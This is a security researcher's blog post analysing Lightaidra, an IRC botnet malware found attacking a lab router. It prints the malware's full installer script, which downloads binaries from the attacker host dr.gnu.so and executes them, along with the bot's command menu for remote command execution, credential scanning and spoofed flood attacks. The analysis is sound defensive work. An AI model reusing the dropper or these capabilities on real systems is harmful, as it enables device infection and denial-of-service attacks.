Malware for Home Routers found in the Wild

alt text

Overview

In my previous post I’ve mentioned that my coworker Konstantin Agouros captured a malware which attacked one of his routers in a lab.

For a long time most of us, security researchers, have been warning about the risk that poses routers and other network devices that run embedded systems that usually are in pretty bad shape when it comes to security.

We all do a bunch of researches that commonly end with some interesting results. When we comunicate the concerns that raised in our minds because of those research outcomes to our customers or even the ventors affected it is very common to face the following response: that’s theoretical, there’s nothing like that in the wild!.

This post is dedicated to all these people, the ones who like us do the research (yeah, keep working we are doing the right thing) and the people who basically tell us we are wasting our time.

Technical details

Konstantin gave me two files, an ELF binary and a shell script.

getbinaries.sh: the shell script file
arm: the ELF binary

Since the symbols were not stripped from the ELF binary, a quick callgraph gives us a pretty straight view of what the main functionalities of the malware.

alt text

The malware runs the following shell script in order to install itself.

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://dr.gnu.so"

# NAME OF BINARIES:
REFERENCE_MIPSEL="mipsel"
REFERENCE_MIPS="mips"
REFERENCE_SUPERH="sh"
REFERENCE_ARM="arm"
REFERENCE_PPC="ppc"

rm -fr /var/run/${REFERENCE_MIPSEL} \
        /var/run/${REFERENCE_MIPS} \
        /var/run/${REFERENCE_SUPERH} \
        /var/run/${REFERENCE_ARM} \
        /var/run/${REFERENCE_PPC}

wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}

sleep 3;
rm -fr /var/run/getbinaries.sh

It downloads all the malware binaries which were compiled for a number of architectures, change the file permissions to make them executable and afterwards it tries to execute them.

Basically, it bruteforces the execution of the malware, not the most clever way to do it but it works of course.

Once it is successfully executed it follows the folloing steps:

Forks the process so that it keeps running in the background (like a service).
Deobfuscates a list of IRC servers it has harcoded in the binary, and then connects to them using a password which is also hardcoded and obfuscated.
Waits for commands.

Beyond the command cmd_exec, which allows the malware to execute whatever console command is given to on the system where it is running, the malware is able to do a couple of things by itself, which are described in the cmd_help command.

alt text

When the cmd_help command is called it sends the following content as a private irc message to the attacker:

alt text

With a bit of clean up we get the following help menu:

'PRIVMSG %s :* *** Access Commands:\n\x00'
'PRIVMSG %s :*\n\x00'
"PRIVMSG %s :* .login                <password>        - login to bot's party-line\n\x00"
"PRIVMSG %s :* .logout                                 - logout from bot's party-line\n\x00"
'PRIVMSG %s :* *** Miscs Commands\n\x00'
'PRIVMSG %s :* .exec                 <commands>        - execute a system command\n\x00'
'PRIVMSG %s :* .version                                - show the current version of bot\n\x00'
'PRIVMSG %s :* .status                                 - show the status of bot\n\x00'
'PRIVMSG %s :* .help                                   - show this help message\n\x00'
'PRIVMSG %s :* *** Scan Commands\n\x00'
'PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you\n\x00'
'PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug\n\x00'
'PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random\n\x00'
'PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug\n\x00'
'PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random\n\x00'
'PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug\n\x00'
'PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random\n\x00'
'PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug\n\x00'
'PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)\n\x00'
'PRIVMSG %s :* *** DDos Commands:\n\x00'
'PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,\n\x00'
'PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs\n\x00'
'PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86\n\x00'
'PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof\n\x00'
'PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder\n\x00'
'PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)\n\x00'
'PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder\n\x00'
'PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)\n\x00'
'PRIVMSG %s :* *** IRC Commands:\n\x00'
'PRIVMSG %s :* .setchan        <channel>               - set new master channel\n\x00'
'PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room\n\x00'
'PRIVMSG %s :* .part           <channel>               - part bot from selected room\n\x00'
'PRIVMSG %s :* .quit                                   - kill the current process\n\x00'
'PRIVMSG %s :* *** EOF\n\x00'

What the malware is able to do is self explanatory by reading the above help menu.

The malware abuses a D-Link routers vulnerability, as the help menu says: “d-link config reset bug”, but it could be used to abuse any other given vulnerability, it would be using also any exploit which is uploaded to the router and use it against any target the attack is willing to.

I clarify this because most vendors will say: “we are not vulnerable to these attack”, to dodge the issue.

The truth is that any device which runs Linux suffices for the malware to execute and do its thing.

The attacker only needs a vulnerability to exploit and deploy the malware. Aftewards he/she can attack the rest of the network, or use the embedded system to compromise other networks.

The source code

Within the strings found in the binary, there was one that lead us to the source code of the malware which is available in a github repo!

alt text

Go and check it for yourself: Lightaidra

Interesting Legal Aspects

In Germany, whenever p2p software is used to download content for example from BitTorrent, the owner of connection is made automatically reponsible for the content that was downloaded from his connection.

Now, what if the one downloading contents/attacking/etc is the router? Who is responsible for this activities? The ISP for providing an insecure device?

This is an interesting question, since it definitely isn’t the fault of the person who doesn’t even know what the router is doing. Maybe it is nobody’s fault, who knows.

I bet lawyers and people who care about their privacy would be eager to further research and answer it.

Conclusions

This particular version of the malware was compiled to target routers only, but anybody could modify it to target all soft of embedded devices which are networked connected and running Linux as operating system, since the source code is out there, available to everybody.

I’ve run it in the lab on a Surveillance camera and it ran just fine.

Long story short:

Source Code Available + Multi-Architecture out of the box + Evil people everywhere = What might go wrong? …Right?

Written by

Sergio Alvarez

n.runs security team

if we find it interesting, we post it here ;-)

Malware for Home Routers Found in the Wild

Overview

Technical details

The source code

Interesting Legal Aspects

Conclusions

Written by

Comments